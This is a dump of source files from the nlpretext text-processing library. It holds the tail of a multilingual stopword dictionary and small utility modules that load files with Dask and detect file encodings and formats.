"līdzko",
"ne",
"nebūt",
"nedz",
"nekā",
"nevis",
"nezin",
"no",
"nu",
"nē",
"otrpus",
"pa",
"par",
"pat",
"pie",
"pirms",
"pret",
"priekš",
"pār",
"pēc",
"starp",
"tad",
"tak",
"tapi",
"taps",
"tapsi",
"tapsiet",
"tapsim",
"tapt",
"tapāt",
"tapšu",
"taču",
"te",
"tiec",
"tiek",
"tiekam",
"tiekat",
"tieku",
"tik",
"tika",
"tikai",
"tiki",
"tikko",
"tiklab",
"tiklīdz",
"tiks",
"tiksiet",
"tiksim",
"tikt",
"tiku",
"tikvien",
"tikām",
"tikāt",
"tikšu",
"tomēr",
"topat",
"turpretim",
"turpretī",
"tā",
"tādēļ",
"tālab",
"tāpēc",
"un",
"uz",
"vai",
"var",
"varat",
"varēja",
"varēji",
"varēju",
"varējām",
"varējāt",
"varēs",
"varēsi",
"varēsiet",
"varēsim",
"varēt",
"varēšu",
"vien",
"virs",
"virspus",
"vis",
"viņpus",
"zem",
"ārpus",
"šaipus",
],
"th": [
"กล่าว",
"กว่า",
"กัน",
"กับ",
"การ",
"ก็",
"ก่อน",
"ขณะ",
"ขอ",
"ของ",
"ขึ้น",
"คง",
"ครั้ง",
"ความ",
"คือ",
"จะ",
"จัด",
"จาก",
"จึง",
"ช่วง",
"ซึ่ง",
"ดัง",
"ด้วย",
"ด้าน",
"ตั้ง",
"ตั้งแต่",
"ตาม",
"ต่อ",
"ต่าง",
"ต่างๆ",
"ต้อง",
"ถึง",
"ถูก",
"ถ้า",
"ทั้ง",
"ทั้งนี้",
"ทาง",
"ที่",
"ที่สุด",
"ทุก",
"ทํา",
"ทําให้",
"นอกจาก",
"นัก",
"นั้น",
"นี้",
"น่า",
"นํา",
"บาง",
"ผล",
"ผ่าน",
"พบ",
"พร้อม",
"มา",
"มาก",
"มี",
"ยัง",
"รวม",
"ระหว่าง",
"รับ",
"ราย",
"ร่วม",
"ลง",
"วัน",
"ว่า",
"สุด",
"ส่ง",
"ส่วน",
"สําหรับ",
"หนึ่ง",
"หรือ",
"หลัง",
"หลังจาก",
"หลาย",
"หาก",
"อยาก",
"อยู่",
"อย่าง",
"ออก",
"อะไร",
"อาจ",
"อีก",
"เขา",
"เข้า",
"เคย",
"เฉพาะ",
"เช่น",
"เดียว",
"เดียวกัน",
"เนื่องจาก",
"เปิด",
"เปิดเผย",
"เป็น",
"เป็นการ",
"เพราะ",
"เพื่อ",
"เมื่อ",
"เรา",
"เริ่ม",
"เลย",
"เห็น",
"เอง",
"แต่",
"แบบ",
"แรก",
"และ",
"แล้ว",
"แห่ง",
"โดย",
"ใน",
"ให้",
"ได้",
"ไป",
"ไม่",
"ไว้",
],
"ar": [
"،",
"أ",
"ا",
"اثر",
"اجل",
"احد",
"اخرى",
"اذا",
"اربعة",
"اطار",
"اعادة",
"اعلنت",
"اف",
"اكثر",
"اكد",
"الا",
"الاخيرة",
"الان",
"الاول",
"الاولى",
"التى",
"التي",
"الثاني",
"الثانية",
"الذاتي",
"الذى",
"الذي",
"الذين",
"السابق",
"الف",
"الماضي",
"المقبل",
"الوقت",
"الى",
"اليوم",
"اما",
"امام",
"امس",
"ان",
"انه",
"انها",
"او",
"اول",
"اي",
"ايار",
"ايام",
"ايضا",
"ب",
"باسم",
"بان",
"برس",
"بسبب",
"بشكل",
"بعد",
"بعض",
"بن",
"به",
"بها",
"بين",
"تم",
"ثلاثة",
"ثم",
"جميع",
"حاليا",
"حتى",
"حوالى",
"حول",
"حيث",
"حين",
"خلال",
"دون",
"ذلك",
"زيارة",
"سنة",
"سنوات",
"شخصا",
"صباح",
"صفر",
"ضد",
"ضمن",
"عام",
"عاما",
"عدة",
"عدد",
"عدم",
"عشر",
"عشرة",
"على",
"عليه",
"عليها",
"عن",
"عند",
"عندما",
"غدا",
"غير",
"ـ",
"ف",
"فان",
"فى",
"في",
"فيه",
"فيها",
"قال",
"قبل",
"قد",
"قوة",
"كان",
"كانت",
"كل",
"كلم",
"كما",
"لا",
"لدى",
"لقاء",
"لكن",
"للامم",
"لم",
"لن",
"له",
"لها",
"لوكالة",
"ما",
"مايو",
"مساء",
"مع",
"مقابل",
"مليار",
"مليون",
"من",
"منذ",
"منها",
"نحو",
"نفسه",
"نهاية",
"هذا",
"هذه",
"هناك",
"هو",
"هي",
"و",
"و6",
"واحد",
"واضاف",
"واضافت",
"واكد",
"وان",
"واوضح",
"وفي",
"وقال",
"وقالت",
"وقد",
"وقف",
"وكان",
"وكانت",
"ولا",
"ولم",
"ومن",
"وهو",
"وهي",
"يكون",
"يمكن",
"يوم",
],
"bg": [
"а",
"автентичен",
"аз",
"ако",
"ала",
"бе",
"без",
"беше",
"би",
"бивш",
"бивша",
"бившо",
"бил",
"била",
"били",
"било",
"благодаря",
"близо",
"бъдат",
"бъде",
"бяха",
"в",
"вас",
"ваш",
"ваша",
"вероятно",
"вече",
"взема",
"ви",
"вие",
"винаги",
"внимава",
"време",
"все",
"всеки",
"всички",
"всичко",
"всяка",
"във",
"въпреки",
"върху",
"г",
"ги",
"главен",
"главна",
"главно",
"глас",
"го",
"година",
"години",
"годишен",
"д",
"да",
"дали",
"два",
"двама",
"двамата",
"две",
"двете",
"ден",
"днес",
"дни",
"до",
"добра",
"добре",
"добро",
"добър",
"докато",
"докога",
"дори",
"досега",
"доста",
"друг",
"друга",
"други",
"е",
"евтин",
"едва",
"един",
"една",
"еднаква",
"еднакви",
"еднакъв",
"едно",
"екип",
"ето",
"живот",
"за",
"забавям",
"зад",
"заедно",
"заради",
"засега",
"заспал",
"затова",
"защо",
"защото",
"и",
"из",
"или",
"им",
"има",
"имат",
"иска",
"й",
"каза",
"как",
"каква",
"какво",
"както",
"какъв",
"като",
"кога",
"когато",
"което",
"които",
"кой",
"който",
"колко",
"която",
"къде",
"където",
"към",
"лесен",
"лесно",
"ли",
"лош",
"м",
"май",
"малко",
"ме",
"между",
"мек",
"мен",
"месец",
"ми",
"много",
"мнозина",
"мога",
"могат",
"може",
"мокър",
"моля",
"момента",
"му",
"н",
"на",
"над",
"назад",
"най",
"направи",
"напред",
"например",
"нас",
"не",
"него",
"нещо",
"нея",
"ни",
"ние",
"никой",
"нито",
"нищо",
"но",
"нов",
"нова",
"нови",
"новина",
"някои",
"някой",
"няколко",
"няма",
"обаче",
"около",
"освен",
"особено",
"от",
"отгоре",
"отново",
"още",
"пак",
"по",
"повече",
"повечето",
"под",
"поне",
"поради",
"после",
"почти",
"прави",
"пред",
"преди",
"през",
"при",
"пък",
"първата",
"първи",
"първо",
"пъти",
"равен",
"равна",
"с",
"са",
"сам",
"само",
"се",
"сега",
"си",
"син",
"скоро",
"след",
"следващ",
"сме",
"смях",
"според",
"сред",
"срещу",
"сте",
"съм",
"със",
"също",
"т",
"т.н.",
"тази",
"така",
"такива",
"такъв",
"там",
"твой",
"те",
"тези",
"ти",
"то",
"това",
"тогава",
"този",
"той",
"толкова",
"точно",
"три",
"трябва",
"тук",
"тъй",
"тя",
"тях",
"у",
"утре",
"харесва",
"хиляди",
"ч",
"часа",
"че",
"често",
"чрез",
"ще",
"щом",
"юмрук",
"я",
"як",
],
"bn": [
"অনেক",
"অন্য",
"অবশ্য",
"আগে",
"আছে",
"আজ",
"আবার",
"আমরা",
"আমাদের",
"আর",
"ই",
"উত্তর",
"উপর",
"উপরে",
"এ",
"এই",
"এক্",
"এখন",
"এত",
"এব",
"এমন",
"এমনি",
"এর",
"এস",
"এসে",
"ও",
"ওই",
"কমনে",
"করা",
"করে",
"কাছে",
"কাজ",
"কাজে",
"কারণ",
"কি",
"কিছু",
"কে",
"কেউ",
"কেখা",
"কেন",
"কোটি",
"কোনো",
"কয়েক",
"খুব",
"গিয়ে",
"গেল",
"চার",
"চালু",
"চেষ্টা",
"ছিল",
"জানা",
"জ্নজন",
"টি",
"তখন",
"তবে",
"তা",
"তাই",
"তো",
"থাকা",
"থেকে",
"দিন",
"দু",
"দুই",
"দেওয়া",
"ধামার",
"নতুন",
"না",
"নাগাদ",
"নিয়ে",
"নেওয়া",
"নয়",
"পর",
"পরে",
"পাচ",
"পি",
"পেয়্র্",
"প্রতি",
"প্রথম",
"প্রযন্ত",
"প্রাথমিক",
"প্রায়",
"বক্তব্য",
"বন",
"বলা",
"বলে",
"বলেন",
"বহু",
"বা",
"বি",
"বিভিন্ন",
"বেশ",
"বেশি",
"মতো",
"মধ্যে",
"মনে",
"যখন",
"যদি",
"যা",
"যাওয়া",
"যে",
"র",
"রকম",
"লক্ষ",
"শুধু",
"শুরু",
"সঙ্গে",
"সব",
"সহ",
"সাধারণ",
"সামনে",
"সি",
"সে",
"সেই",
"হতে",
"হাজার",
"হয়",
],
"fa": [
"آباد",
"آره",
"آری",
"آمد",
"آمده",
"آن",
"آنان",
"آنجا",
"آنكه",
"آنها",
"آنچه",
"آورد",
"آورده",
"آيد",
"آیا",
"اثرِ",
"از",
"است",
"استفاده",
"اش",
"اكنون",
"البته",
"البتّه",
"ام",
"اما",
"امروز",
"امسال",
"اند",
"انکه",
"او",
"اول",
"اي",
"ايشان",
"ايم",
"اين",
"اينكه",
"اگر",
"با",
"بار",
"بارة",
"باره",
"باشد",
"باشند",
"باشيم",
"بالا",
"بالایِ",
"بايد",
"بدون",
"بر",
"برابرِ",
"براساس",
"براي",
"برایِ",
"برخوردار",
"برخي",
"برداري",
"بروز",
"بسيار",
"بسياري",
"بعد",
"بعری",
"بعضي",
"بلكه",
"بله",
"بلکه",
"بلی",
"بنابراين",
"بندي",
"به",
"بهترين",
"بود",
"بودن",
"بودند",
"بوده",
"بي",
"بيست",
"بيش",
"بيشتر",
"بيشتري",
"بين",
"بی",
"بیرونِ",
"تا",
"تازه",
"تاكنون",
"تان",
"تحت",
"تر",
"ترين",
"تمام",
"تمامي",
"تنها",
"تواند",
"توانند",
"توسط",
"تولِ",
"تویِ",
"جا",
"جاي",
"جايي",
"جدا",
"جديد",
"جريان",
"جز",
"جلوگيري",
"جلویِ",
"حتي",
"حدودِ",
"حق",
"خارجِ",
"خدمات",
"خواست",
"خواهد",
"خواهند",
"خواهيم",
"خود",
"خويش",
"خیاه",
"داد",
"دادن",
"دادند",
"داده",
"دارد",
"دارند",
"داريم",
"داشت",
"داشتن",
"داشتند",
"داشته",
"دانست",
"دانند",
"در",
"درباره",
"دنبالِ",
"ده",
"دهد",
"دهند",
"دو",
"دوم",
"ديده",
"ديروز",
"ديگر",
"ديگران",
"ديگري",
"دیگر",
"را",
"راه",
"رفت",
"رفته",
"روب",
"روزهاي",
"روي",
"رویِ",
"ريزي",
"زياد",
"زير",
"زيرا",
"زیرِ",
"سابق",
"ساخته",
"سازي",
"سراسر",
"سریِ",
"سعي",
"سمتِ",
"سوم",
"سوي",
"سویِ",
"سپس",
"شان",
"شايد",
"شد",
"شدن",
"شدند",
"شده",
"شش",
"شما",
"شناسي",
"شود",
"شوند",
"صورت",
"ضدِّ",
"ضمن",
"طبقِ",
"طريق",
"طور",
"طي",
"عقبِ",
"علّتِ",
"عنوانِ",
"غير",
"فقط",
"فكر",
"فوق",
"قابل",
"قبل",
"قصدِ",
"كرد",
"كردم",
"كردن",
"كردند",
"كرده",
"كسي",
"كل",
"كمتر",
"كند",
"كنم",
"كنند",
"كنيد",
"كنيم",
"كه",
"لطفاً",
"ما",
"مان",
"مانند",
"مانندِ",
"مثل",
"مثلِ",
"مختلف",
"مدّتی",
"مردم",
"مرسی",
"مقابل",
"من",
"مورد",
"مي",
"ميليارد",
"ميليون",
"مگر",
"ناشي",
"نام",
"نبايد",
"نبود",
"نخست",
"نخستين",
"نخواهد",
"ندارد",
"ندارند",
"نداشته",
"نزديك",
"نزدِ",
"نزدیکِ",
"نشان",
"نشده",
"نظير",
"نكرده",
"نمايد",
"نمي",
"نه",
"نوعي",
"نيز",
"نيست",
"ها",
"هاي",
"هايي",
"هر",
"هرگز",
"هزار",
"هست",
"هستند",
"هستيم",
"هفت",
"هم",
"همان",
"همه",
"همواره",
"همين",
"همچنان",
"همچنين",
"همچون",
"همین",
"هنوز",
"هنگام",
"هنگامِ",
"هنگامی",
"هيچ",
"هیچ",
"و",
"وسطِ",
"وقتي",
"وقتیکه",
"ولی",
"وي",
"وگو",
"يا",
"يابد",
"يك",
"يكديگر",
"يكي",
"ّه",
"پاعینِ",
"پس",
"پنج",
"پيش",
"پیش",
"پیشِ",
"چرا",
"چطور",
"چند",
"چندین",
"چنين",
"چه",
"چهار",
"چون",
"چيزي",
"چگونه",
"چیز",
"چیزی",
"چیست",
"کجا",
"کجاست",
"کدام",
"کس",
"کسی",
"کنارِ",
"که",
"کَی",
"کی",
"گذاري",
"گذاشته",
"گردد",
"گرفت",
"گرفته",
"گروهي",
"گفت",
"گفته",
"گويد",
"گويند",
"گيرد",
"گيري",
"یا",
"یک",
],
"hi": [
"अंदर",
"अत",
"अदि",
"अप",
"अपना",
"अपनि",
"अपनी",
"अपने",
"अभि",
"अभी",
"आदि",
"आप",
"इंहिं",
"इंहें",
"इंहों",
"इतयादि",
"इत्यादि",
"इन",
"इनका",
"इन्हीं",
"इन्हें",
"इन्हों",
"इस",
"इसका",
"इसकि",
"इसकी",
"इसके",
"इसमें",
"इसि",
"इसी",
"इसे",
"उंहिं",
"उंहें",
"उंहों",
"उन",
"उनका",
"उनकि",
"उनकी",
"उनके",
"उनको",
"उन्हीं",
"उन्हें",
"उन्हों",
"उस",
"उसके",
"उसि",
"उसी",
"उसे",
"एक",
"एवं",
"एस",
"एसे",
"ऐसे",
"ओर",
"और",
"कइ",
"कई",
"कर",
"करता",
"करते",
"करना",
"करने",
"करें",
"कहते",
"कहा",
"का",
"काफि",
"काफ़ी",
"कि",
"किंहें",
"किंहों",
"कितना",
"किन्हें",
"किन्हों",
"किया",
"किर",
"किस",
"किसि",
"किसी",
"किसे",
"की",
"कुछ",
"कुल",
"के",
"को",
"कोइ",
"कोई",
"कोन",
"कोनसा",
"कौन",
"कौनसा",
"गया",
"घर",
"जब",
"जहाँ",
"जहां",
"जा",
"जिंहें",
"जिंहों",
"जितना",
"जिधर",
"जिन",
"जिन्हें",
"जिन्हों",
"जिस",
"जिसे",
"जीधर",
"जेसा",
"जेसे",
"जैसा",
"जैसे",
"जो",
"तक",
"तब",
"तरह",
"तिंहें",
"तिंहों",
"तिन",
"तिन्हें",
"तिन्हों",
"तिस",
"तिसे",
"तो",
"था",
"थि",
"थी",
"थे",
"दबारा",
"दवारा",
"दिया",
"दुसरा",
"दुसरे",
"दूसरे",
"दो",
"द्वारा",
"न",
"नहिं",
"नहीं",
"ना",
"निचे",
"निहायत",
"नीचे",
"ने",
"पर",
"पहले",
"पुरा",
"पूरा",
"पे",
"फिर",
"बनि",
"बनी",
"बहि",
"बही",
"बहुत",
"बाद",
"बाला",
"बिलकुल",
"भि",
"भितर",
"भी",
"भीतर",
"मगर",
"मानो",
"मे",
"में",
"यदि",
"यह",
"यहाँ",
"यहां",
"यहि",
"यही",
"या",
"यिह",
"ये",
"रखें",
"रवासा",
"रहा",
"रहे",
"ऱ्वासा",
"लिए",
"लिये",
"लेकिन",
"व",
"वगेरह",
"वरग",
"वर्ग",
"वह",
"वहाँ",
"वहां",
"वहिं",
"वहीं",
"वाले",
"वुह",
"वे",
"वग़ैरह",
"संग",
"सकता",
"सकते",
"सबसे",
"सभि",
"सभी",
"साथ",
"साबुत",
"साभ",
"सारा",
"से",
"सो",
"हि",
"ही",
"हुअ",
"हुआ",
"हुइ",
"हुई",
"हुए",
"हे",
"हें",
"है",
"हैं",
"हो",
"होता",
"होति",
"होती",
"होते",
"होना",
"होने",
],
"mr": [
"अधिक",
"अनेक",
"अशी",
"असलयाचे",
"असलेल्या",
"असा",
"असून",
"असे",
"आज",
"आणि",
"आता",
"आपल्या",
"आला",
"आली",
"आले",
"आहे",
"आहेत",
"एक",
"एका",
"कमी",
"करणयात",
"करून",
"का",
"काम",
"काय",
"काही",
"किवा",
"की",
"केला",
"केली",
"केले",
"कोटी",
"गेल्या",
"घेऊन",
"जात",
"झाला",
"झाली",
"झाले",
"झालेल्या",
"टा",
"डॉ",
"तर",
"तरी",
"तसेच",
"ता",
"ती",
"तीन",
"ते",
"तो",
"त्या",
"त्याचा",
"त्याची",
"त्याच्या",
"त्याना",
"त्यानी",
"त्यामुळे",
"त्री",
"दिली",
"दोन",
"न",
"नाही",
"निर्ण्य",
"पण",
"पम",
"परयतन",
"पाटील",
"म",
"मात्र",
"माहिती",
"मी",
"मुबी",
"म्हणजे",
"म्हणाले",
"म्हणून",
"या",
"याचा",
"याची",
"याच्या",
"याना",
"यानी",
"येणार",
"येत",
"येथील",
"येथे",
"लाख",
"व",
"व्यकत",
"सर्व",
"सागित्ले",
"सुरू",
"हजार",
"हा",
"ही",
"हे",
"होणार",
"होत",
"होता",
"होती",
"होते",
],
"ro": [
"acea",
"aceasta",
"această",
"aceea",
"acei",
"aceia",
"acel",
"acela",
"acele",
"acelea",
"acest",
"acesta",
"aceste",
"acestea",
"aceşti",
"aceştia",
"acolo",
"acord",
"acum",
"ai",
"aia",
"aibă",
"aici",
"al",
"ale",
"alea",
"altceva",
"altcineva",
"am",
"ar",
"are",
"asemenea",
"asta",
"astea",
"astăzi",
"asupra",
"au",
"avea",
"avem",
"aveţi",
"azi",
"aş",
"aşadar",
"aţi",
"bine",
"bucur",
"bună",
"ca",
"care",
"caut",
"ce",
"cel",
"ceva",
"chiar",
"cinci",
"cine",
"cineva",
"contra",
"cu",
"cum",
"cumva",
"curând",
"curînd",
"când",
"cât",
"câte",
"câtva",
"câţi",
"cînd",
"cît",
"cîte",
"cîtva",
"cîţi",
"că",
"căci",
"cărei",
"căror",
"cărui",
"către",
"da",
"dacă",
"dar",
"datorită",
"dată",
"dau",
"de",
"deci",
"deja",
"deoarece",
"departe",
"deşi",
"din",
"dinaintea",
"dintr-",
"dintre",
"doi",
"doilea",
"două",
"drept",
"după",
"dă",
"ea",
"ei",
"el",
"ele",
"eram",
"este",
"eu",
"eşti",
"face",
"fata",
"fi",
"fie",
"fiecare",
"fii",
"fim",
"fiu",
"fiţi",
"frumos",
"fără",
"graţie",
"halbă",
"iar",
"ieri",
"la",
"le",
"li",
"lor",
"lui",
"lângă",
"lîngă",
"mai",
"mea",
"mei",
"mele",
"mereu",
"meu",
"mi",
"mie",
"mine",
"mult",
"multă",
"mulţi",
"mulţumesc",
"mâine",
"mîine",
"mă",
"ne",
"nevoie",
"nici",
"nicăieri",
"nimeni",
"nimeri",
"nimic",
"nişte",
"noastre",
"noastră",
"noi",
"noroc",
"nostru",
"nouă",
"noştri",
"nu",
"opt",
"ori",
"oricare",
"orice",
"oricine",
"oricum",
"oricând",
"oricât",
"oricînd",
"oricît",
"oriunde",
"patra",
"patru",
"patrulea",
"pe",
"pentru",
"peste",
"pic",
"poate",
"pot",
"prea",
"prima",
"primul",
"prin",
"printr-",
"puţin",
"puţina",
"puţină",
"până",
"pînă",
"rog",
"sa",
"sale",
"sau",
"se",
"spate",
"spre",
"sub",
"sunt",
"suntem",
"sunteţi",
"sută",
"sînt",
"sîntem",
"sînteţi",
"să",
"săi",
"său",
"ta",
"tale",
"te",
"timp",
"tine",
"toate",
"toată",
"tot",
"totuşi",
"toţi",
"trei",
"treia",
"treilea",
"tu",
"tăi",
"tău",
"un",
"una",
"unde",
"undeva",
"unei",
"uneia",
"unele",
"uneori",
"unii",
"unor",
"unora",
"unu",
"unui",
"unuia",
"unul",
"vi",
"voastre",
"voastră",
"voi",
"vostru",
"vouă",
"voştri",
"vreme",
"vreo",
"vreun",
"vă",
"zece",
"zero",
"zi",
"zice",
"îi",
"îl",
"îmi",
"împotriva",
"în",
"înainte",
"înaintea",
"încotro",
"încât",
"încît",
"între",
"întrucât",
"întrucît",
"îţi",
"ăla",
"ălea",
"ăsta",
"ăstea",
"ăştia",
"şapte",
"şase",
"şi",
"ştiu",
"ţi",
"ţie",
],
"en": [
"a",
"a's",
"able",
"about",
"above",
"according",
"accordingly",
"across",
"actually",
"after",
"afterwards",
"again",
"against",
"ain't",
"all",
"allow",
"allows",
"almost",
"alone",
"along",
"already",
"also",
"although",
"always",
"am",
"among",
"amongst",
"an",
"and",
"another",
"any",
"anybody",
"anyhow",
"anyone",
"anything",
"anyway",
"anyways",
"anywhere",
"apart",
"appear",
"appreciate",
"appropriate",
"are",
"aren't",
"around",
"as",
"aside",
"ask",
"asking",
"associated",
"at",
"available",
"away",
"awfully",
"b",
"be",
"became",
"because",
"become",
"becomes",
"becoming",
"been",
"before",
"beforehand",
"behind",
"being",
"believe",
"below",
"beside",
"besides",
"best",
"better",
"between",
"beyond",
"both",
"brief",
"but",
"by",
"c",
"c'mon",
"c's",
"came",
"can",
"can't",
"cannot",
"cant",
"cause",
"causes",
"certain",
"certainly",
"changes",
"clearly",
"co",
"com",
"come",
"comes",
"concerning",
"consequently",
"consider",
"considering",
"contain",
"containing",
"contains",
"corresponding",
"could",
"couldn't",
"course",
"currently",
"d",
"definitely",
"described",
"despite",
"did",
"didn't",
"different",
"do",
"does",
"doesn't",
"doing",
"don't",
"done",
"down",
"downwards",
"during",
"e",
"each",
"edu",
"eg",
"eight",
"either",
"else",
"elsewhere",
"enough",
"entirely",
"especially",
"et",
"etc",
"even",
"ever",
"every",
"everybody",
"everyone",
"everything",
"everywhere",
"ex",
"exactly",
"example",
"except",
"f",
"far",
"few",
"fifth",
"first",
"five",
"followed",
"following",
"follows",
"for",
"former",
"formerly",
"forth",
"four",
"from",
"further",
"furthermore",
"g",
"get",
"gets",
"getting",
"given",
"gives",
"go",
"goes",
"going",
"gone",
"got",
"gotten",
"greetings",
"h",
"had",
"hadn't",
"happens",
"hardly",
"has",
"hasn't",
"have",
"haven't",
"having",
"he",
"he's",
"hello",
"help",
"hence",
"her",
"here",
"here's",
"hereafter",
"hereby",
"herein",
"hereupon",
"hers",
"herself",
"hi",
"him",
"himself",
"his",
"hither",
"hopefully",
"how",
"howbeit",
"however",
"i",
"i'd",
"i'll",
"i'm",
"i've",
"ie",
"if",
"ignored",
"immediate",
"in",
"inasmuch",
"inc",
"indeed",
"indicate",
"indicated",
"indicates",
"inner",
"insofar",
"instead",
"into",
"inward",
"is",
"isn't",
"it",
"it'd",
"it'll",
"it's",
"its",
"itself",
"j",
"just",
"k",
"keep",
"keeps",
"kept",
"know",
"known",
"knows",
"l",
"last",
"lately",
"later",
"latter",
"latterly",
"least",
"less",
"lest",
"let",
"let's",
"like",
"liked",
"likely",
"little",
"look",
"looking",
"looks",
"ltd",
"m",
"mainly",
"many",
"may",
"maybe",
"me",
"mean",
"meanwhile",
"merely",
"might",
"more",
"moreover",
"most",
"mostly",
"much",
"must",
"my",
"myself",
"n",
"name",
"namely",
"nd",
"near",
"nearly",
"necessary",
"need",
"needs",
"neither",
"never",
"nevertheless",
"new",
"next",
"nine",
"no",
"nobody",
"non",
"none",
"noone",
"nor",
"normally",
"not",
"nothing",
"novel",
"now",
"nowhere",
"o",
"obviously",
"of",
"off",
"often",
"oh",
"ok",
"okay",
"old",
"on",
"once",
"one",
"ones",
"only",
"onto",
"or",
"other",
"others",
"otherwise",
"ought",
"our",
"ours",
"ourselves",
"out",
"outside",
"over",
"overall",
"own",
"p",
"particular",
"particularly",
"per",
"perhaps",
"placed",
"please",
"plus",
"possible",
"presumably",
"probably",
"provides",
"q",
"que",
"quite",
"qv",
"r",
"rather",
"rd",
"re",
"really",
"reasonably",
"regarding",
"regardless",
"regards",
"relatively",
"respectively",
"right",
"s",
"said",
"same",
"saw",
"say",
"saying",
"says",
"second",
"secondly",
"see",
"seeing",
"seem",
"seemed",
"seeming",
"seems",
"seen",
"self",
"selves",
"sensible",
"sent",
"serious",
"seriously",
"seven",
"several",
"shall",
"she",
"should",
"shouldn't",
"since",
"six",
"so",
"some",
"somebody",
"somehow",
"someone",
"something",
"sometime",
"sometimes",
"somewhat",
"somewhere",
"soon",
"sorry",
"specified",
"specify",
"specifying",
"still",
"sub",
"such",
"sup",
"sure",
"t",
"t's",
"take",
"taken",
"tell",
"tends",
"th",
"than",
"thank",
"thanks",
"thanx",
"that",
"that's",
"thats",
"the",
"their",
"theirs",
"them",
"themselves",
"then",
"thence",
"there",
"there's",
"thereafter",
"thereby",
"therefore",
"therein",
"theres",
"thereupon",
"these",
"they",
"they'd",
"they'll",
"they're",
"they've",
"think",
"third",
"this",
"thorough",
"thoroughly",
"those",
"though",
"three",
"through",
"throughout",
"thru",
"thus",
"to",
"together",
"too",
"took",
"toward",
"towards",
"tried",
"tries",
"truly",
"try",
"trying",
"twice",
"two",
"u",
"un",
"under",
"unfortunately",
"unless",
"unlikely",
"until",
"unto",
"up",
"upon",
"us",
"use",
"used",
"useful",
"uses",
"using",
"usually",
"uucp",
"v",
"value",
"various",
"very",
"via",
"viz",
"vs",
"w",
"want",
"wants",
"was",
"wasn't",
"way",
"we",
"we'd",
"we'll",
"we're",
"we've",
"welcome",
"well",
"went",
"were",
"weren't",
"what",
"what's",
"whatever",
"when",
"whence",
"whenever",
"where",
"where's",
"whereafter",
"whereas",
"whereby",
"wherein",
"whereupon",
"wherever",
"whether",
"which",
"while",
"whither",
"who",
"who's",
"whoever",
"whole",
"whom",
"whose",
"why",
"will",
"willing",
"wish",
"with",
"within",
"without",
"won't",
"wonder",
"would",
"wouldn't",
"x",
"y",
"yes",
"yet",
"you",
"you'd",
"you'll",
"you're",
"you've",
"your",
"yours",
"yourself",
"yourselves",
"z",
"zero",
],
}
================================================
FILE: nlpretext/_utils/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/_utils/daskloader.py
================================================
# mypy: disable-error-code="attr-defined"
from typing import List, Union
import dask.bag as db
import dask.dataframe as dd
def read_text(files_path: Union[str, List[str]], encoding: str):  # type: ignore
    """Load text file(s) line by line into a Dask DataFrame, stripping each line."""
    lines = db.read_text(files_path, encoding=encoding)
    return lines.str.strip().to_dataframe()
def read_json(files_path: Union[str, List[str]], encoding: str):  # type: ignore
    """Load JSON file(s) into a Dask DataFrame."""
    frame = dd.read_json(files_path, encoding=encoding)
    return frame
def read_csv(files_path: Union[str, List[str]], encoding: str):  # type: ignore
    """Load CSV file(s) into a Dask DataFrame."""
    frame = dd.read_csv(files_path, encoding=encoding)
    return frame
def read_parquet(files_path: Union[str, List[str]], encoding: str):  # type: ignore
    """Load Parquet file(s) into a Dask DataFrame.

    NOTE(review): ``dd.read_parquet`` does not document an ``encoding``
    keyword — confirm this call path is actually exercised with it.
    """
    frame = dd.read_parquet(files_path, encoding=encoding)
    return frame
================================================
FILE: nlpretext/_utils/file_loader.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# mypy: disable-error-code="assignment"
from typing import List, Union
import chardet
from nlpretext._config import constants
def detect_encoding(file_path_or_string: Union[str, bytes], n_lines: int = 100) -> dict:
    """
    Predict a file's encoding using chardet.

    Parameters
    ----------
    file_path_or_string : str | bytes
        if filepath, will open the file and sample its first ``n_lines`` lines.
        Otherwise will predict from the bytes directly.
    n_lines : int
        number of lines to sample when reading from a file

    Returns
    -------
    dict
        the chardet detection result, e.g.
        ``{"encoding": "utf-8", "confidence": 0.99, ...}``
    """
    if isinstance(file_path_or_string, bytes):
        rawdata = file_path_or_string
    else:
        with open(file_path_or_string, "rb") as f:
            # readline() returns b"" past EOF, so short files are safe.
            rawdata = b"".join([f.readline() for _ in range(n_lines)])
    # chardet.detect returns a dict, not a str; the previous `str` annotations
    # were wrong (and were the reason mypy assignment errors were silenced
    # file-wide). Runtime behavior is unchanged: the full dict is returned.
    chardet_value: dict = chardet.detect(rawdata)
    return chardet_value
def check_text_file_format(filepath: Union[str, List[str]]) -> str:
    """
    Retrieve format of a file path or list of files path, among .csv, .json, .parquet and .txt.

    Parameters
    ----------
    filepath : str | list(str)
        A filepath with wildcard (eg. *.txt), or a list of filepaths.

    Returns
    -------
    str
        Format of the specified file path, among .json, .csv, .parquet or .txt

    Raises
    ------
    ValueError
        If no file path is provided, if several different formats are mixed,
        or if a path has an unrecognized format.
    """
    if not isinstance(filepath, (list, tuple)):
        filepath = [filepath]
    if not filepath:
        # Previously an empty list fell through to format_list[0] -> IndexError.
        raise ValueError("No file path provided")
    pattern = constants.TEXT_FILE_FORMATS_PATTERN
    format_re_list = [pattern.match(path) for path in filepath]
    format_list = [format_re.group(1) for format_re in format_re_list if format_re]
    if len(set(format_list)) > 1:
        raise ValueError(f"Multiple file formats found in file path list: {format_list}")
    if None in format_re_list:
        raise ValueError(
            "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted"  # noqa: E501
        )
    return format_list[0]
================================================
